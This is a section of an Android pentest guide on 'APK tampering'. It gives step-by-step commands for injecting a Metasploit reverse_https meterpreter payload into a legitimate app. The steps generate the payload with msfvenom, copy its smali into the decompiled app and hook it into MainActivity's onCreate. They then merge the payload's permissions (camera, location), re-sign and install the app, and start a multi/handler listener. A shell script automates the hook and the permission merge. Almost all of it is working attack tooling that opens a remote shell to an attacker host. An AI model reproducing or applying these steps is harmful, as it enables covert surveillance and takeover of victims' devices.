[A]ndroid [A]pplication [P]entest [G]uide
4. APK TAMPERING

4.1 DIY - Simple Reverse Meterpreter (Non-Xamarin)

Create Payload

msfvenom -p android/meterpreter/reverse_https LHOST=<ATTACKER-IP> LPORT=<ATTACKER-PORT> -o meterpreter.apk

Tampering

Decompile meterpreter.apk & original app_name.apk

apktool d -f -o ./payload_apk /path/to/your/meterpreter.apk
apktool d -f -o ./original_apk /path/to/your/app_name.apk

Add the payload's package directory to the original project (the smali class path Lcom/metasploit/stage/Payload; used in the hook below maps to smali/com/metasploit/stage/, so it has to live under smali/, not at the project root):

mkdir -p ./original_apk/smali/com/metasploit/stage

Copy payload files:

cp ./payload_apk/smali/com/metasploit/stage/* ./original_apk/smali/com/metasploit/stage/

Get MainActivity name:

  • In some cases the default name is already "MainActivity"

  • Search AndroidManifest.xml for an <activity>-tag which contains both:

    • <action android:name="android.intent.action.MAIN"/>

    • <category android:name="android.intent.category.LAUNCHER"/>

    • Look out for the tag attribute android:name="core.MainActivity" (it can have a different name). A fully qualified value such as core.MainActivity maps to ./original_apk/smali/core/MainActivity.smali; a value starting with a dot (e.g. ".MainActivity") is relative to the package attribute of the <manifest> tag, so com.example.app with ".MainActivity" maps to smali/com/example/app/MainActivity.smali.

Modify MainActivity.smali

  • Search for:

    • ;->onCreate(Landroid/os/Bundle;)V

    (this matches the invoke-super call to super.onCreate() inside the onCreate method, not the .method header)

  • Add a new line directly after that line and paste (no whitespace between the class descriptor and ->):

    • invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

  • p0 is the Activity instance (this), which is a Context, so the call type-checks when apktool rebuilds the dex

Add all <uses-permission> entries from ./payload_apk/AndroidManifest.xml into the original ./original_apk/AndroidManifest.xml (before the <application> tag)

  • Check for duplicates

  • If some permissions are missing, some meterpreter functions will not work
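The two hand-edits above (hooking onCreate and merging permissions) are easy to get wrong on a large app, so here is an added POSIX shell script, not part of the original guide, that does both against apktool output. The sample MainActivity.smali and manifests it creates are constructed inputs for an offline run; the file locations are assumptions and must be pointed at your own decompiled tree.

```shell
#!/bin/sh
# Added example, not part of the original guide: scripts the two hand-edits of
# section 4.1 (hooking onCreate and merging <uses-permission> entries) against
# apktool output. All paths below are assumptions; adjust to your decompiled tree.
set -e

# Append the Payload.start() call after the super.onCreate(...) invocation in
# MainActivity.smali. p0 is 'this' (a Context), matching the guide's invoke-static.
inject_hook() {
    smali="$1"
    hook='    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V'
    if grep -qF 'Lcom/metasploit/stage/Payload;->start' "$smali"; then
        echo "hook already present: $smali" >&2
        return 0
    fi
    awk -v hook="$hook" '
        { print }
        !done && /;->onCreate\(Landroid\/os\/Bundle;\)V/ { print hook; done = 1 }
    ' "$smali" > "$smali.tmp" && mv "$smali.tmp" "$smali"
    # Fail loudly if no super.onCreate() call was found: the hook would never run.
    grep -qF 'Lcom/metasploit/stage/Payload;->start' "$smali"
}

# Copy every <uses-permission> from the payload manifest that the original app
# does not already declare, inserting it before <application ...>. Prints the
# number of permissions added.
merge_permissions() {
    payload_manifest="$1"
    orig_manifest="$2"
    added=0
    for name in $(grep -o 'uses-permission android:name="[^"]*"' "$payload_manifest" \
                  | sed 's/.*="\(.*\)"/\1/' | sort -u); do
        if grep -qF "android:name=\"$name\"" "$orig_manifest"; then
            continue   # already declared: skip the duplicate
        fi
        awk -v perm="$name" '
            !done && /<application/ { printf "    <uses-permission android:name=\"%s\"/>\n", perm; done = 1 }
            { print }
        ' "$orig_manifest" > "$orig_manifest.tmp" && mv "$orig_manifest.tmp" "$orig_manifest"
        added=$((added + 1))
    done
    echo "$added"
}

# Constructed sample inputs (not real apktool output) so the script runs offline.
run_demo() {
    work="$1"
    mkdir -p "$work"
    cat > "$work/MainActivity.smali" <<'EOF'
.class public Lcore/MainActivity;
.super Landroid/app/Activity;

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 0
    .param p1, "savedInstanceState"    # Landroid/os/Bundle;

    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

    return-void
.end method
EOF
    cat > "$work/payload.xml" <<'EOF'
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.metasploit.stage">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <application android:label="MainActivity">
    </application>
</manifest>
EOF
    cat > "$work/original.xml" <<'EOF'
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="App">
        <activity android:name="core.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
EOF
    inject_hook "$work/MainActivity.smali"
    merge_permissions "$work/payload.xml" "$work/original.xml"
}
```

On a real project call inject_hook on the MainActivity.smali you located from the manifest and merge_permissions with ./payload_apk/AndroidManifest.xml and ./original_apk/AndroidManifest.xml; INTERNET is typically already declared, so only the missing ones (location, camera, etc.) are inserted, and running inject_hook twice does not double the hook.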

Recompile:

apktool b ./original_apk

Sign the apk (key creation, alignment, signing). apksigner must be the last step: run zipalign before it, because aligning afterwards invalidates the signature:

keytool -genkey -v -keystore my-release-key.keystore -alias myalias -keyalg RSA -keysize 2048 -validity 10000
/home/<user>/Android/Sdk/build-tools/<27.0.3_OR_CHECK_YOUR_USED_VERSION>/zipalign -p -f 4 ./original_apk/dist/app_name.apk ./original_apk/dist/app_name-aligned.apk
/home/<user>/Android/Sdk/build-tools/<27.0.3_OR_CHECK_YOUR_USED_VERSION>/apksigner sign --ks my-release-key.keystore ./original_apk/dist/app_name-aligned.apk

Install the modified apk. If the unmodified app is already installed on the device, uninstall it first: the rebuilt apk is signed with a different key, so an in-place install fails with a signature mismatch:

adb uninstall <original.package.name>
adb install /path/to/app_with_backdoor.apk

Start meterpreter session handler (use same IP & port as you used to generate the payload above):

msfconsole
use multi/handler
set payload android/meterpreter/reverse_https
set LHOST <ATTACKER-IP>
set LPORT <ATTACKER-PORT>
run

START APPLICATION ON DEVICE AND HAVE FUN!!! ;)

INFO


Last updated 5 years ago
